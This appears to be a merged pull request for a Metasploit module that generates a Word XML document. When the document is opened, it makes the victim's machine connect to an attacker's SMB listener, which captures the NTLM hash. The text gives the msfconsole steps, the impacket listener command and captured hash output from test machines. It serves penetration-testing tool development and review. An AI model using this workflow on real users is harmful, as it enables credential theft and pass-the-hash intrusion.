### PR TITLE
Added auxiliary/fileformat/multidrop support for Word XML documents

### PR DESCRIPTION
**Pull request by asoto-r7**
This update to the `auxiliary/fileformat/multidrop` adds support for an XML file to be parsed by Microsoft Word, triggering an SMB request to an arbitrary host.  A listening SMB server can accept the request and capture the NTLM hash to be used in future pass-the-hash attacks.

## Verification

Create a malicious XML document, tested against Microsoft Word 2016:

- [x] Start `msfconsole`
- [x] `use auxiliary/fileformat/multidrop`
- [x] `set FILENAME open_me.xml`
- [x] `set LHOST [SMB_LISTENER IP]`
- [x] `run`
- [x] Copy the document from the path output by the module to a target
- [x] Start an SMB listener at the `[LISTENER IP]`, for example, using `impacket/examples/smbserver.py -smb2support share .`
- [x] Open the document on a target using Microsoft Word.  By default, Windows will prompt to open the file in the "Office XML Handler" or the "Microsoft Application Virtualization Virtual Process Launcher".  Either one should work fine, and subsequently launch Microsoft Word.
- [x] Ignore the error "This file has custom XML elements that are no longer supported in Word.  Saving the file will remove these elements permanently."  By this point, the SMB connection has already occurred.
- [x] Once the document opens, observe the text "FATAL ERROR: The document failed to render properly."
- [x] Switch back to the SMB listener.  For example, Impacket's SMB server should output:

```
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.199.130,49715)
[*] AUTHENTICATE_MESSAGE (DESKTOP-Q05UKIU\root,DESKTOP-Q05UKIU)
[*] User root\DESKTOP-Q05UKIU authenticated successfully
[*] root::DESKTOP-Q05UKIU:4141414141414141:13ad4b56c30ba00a163305689bb19bd0:0101000000000000009df2943845d401adc4777ec3bde874000000000100100069006d00670077006600540056006400020010006e00680045004600460079006e004c000300100069006d00670077006600540056006400040010006e00680045004600460079006e004c0007000800009df2943845d401060004000200000008003000300000000000000001000000002000007683c54fd20ca3088c836870583478a36b57d1226bdeb184e9c1a921a7bf59d70a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100390039002e00310033003700000000000000000000000000
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (192.168.199.130,49715)
[*] Remaining connections []
```

Test error-handling functionality with invalid FILENAME:
- [x] `use auxiliary/fileformat/multidrop`
- [x] `set FILENAME wrongfilename.bad`
- [x] `set LHOST 1.1.1.1`
- [x] `run`
- [x] Observe the following error: `Auxiliary aborted due to failure: bad-config: Invalid FILENAME option`

### CODE REVIEW

**Comment by bcoles** [comment]
Potentially unpopular opinion: this module should be reserved for file types which leak hashes upon browsing the directory containing the file, as opposed to leaking hashes upon opening the file in a specific program.

Admittedly, creating a module for each file type is overkill. Perhaps the documentation should offer a clear distinction between passive and active files.

**Comment by space-r7** [comment]
@bcoles, I agree. I'll go ahead and land this. We'll work on getting the module refactored at a later date.

**Comment by space-r7** [comment]
Tested:

```
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.37.236,49684)
[*] AUTHENTICATE_MESSAGE (DESKTOP-JSV5SA6\user,DESKTOP-JSV5SA6)
[*] User user\DESKTOP-JSV5SA6 authenticated successfully
[*] user::DESKTOP-JSV5SA6:4141414141414141:a7b95f8c61355c98d74c949e5a4a864e:0101000000000000809b30a10b4ad401695bf8a31ff8d27900000000010010005100630077007400500061004f005500020010006200690070004c004300780073004700030010005100630077007400500061004f005500040010006200690070004c00430078007300470007000800809b30a10b4ad40106000400020000000800300030000000000000000100000000200000755a6d0fb8838356a3fd0e07678888b93f5fbc6670426a5a712957373ce96f8f0a001000000000000000000000000000000000000900220063006900660073002f003100390032002e003100360038002e00330037002e003100000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] NetrGetShareInfo Level: 1
[*] NetrWkstaGetInfo Level: 100
[*] NetrServerGetInfo Level: 101
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:share)
[*] Handle: [Errno 54] Connection reset by peer
[*] Closing down connection (192.168.37.236,49684)
[*] Remaining connections []
```

Error handling:
```
msf5 auxiliary(fileformat/multidrop) > set filename whats_this.blah
filename => whats_this.blah
msf5 auxiliary(fileformat/multidrop) > run

[-] Auxiliary aborted due to failure: bad-config: Invalid FILENAME option
[*] Auxiliary module execution completed
msf5 auxiliary(fileformat/multidrop) > 
```

**Comment by space-r7** [comment]
## Release Notes

This addition to `auxiliary/fileformat/multidrop` enables the ability to create an XML file that when opened by Microsoft Word, a request is sent to an SMB listener that connects and captures an NTLM hash.

**Pull request merged**
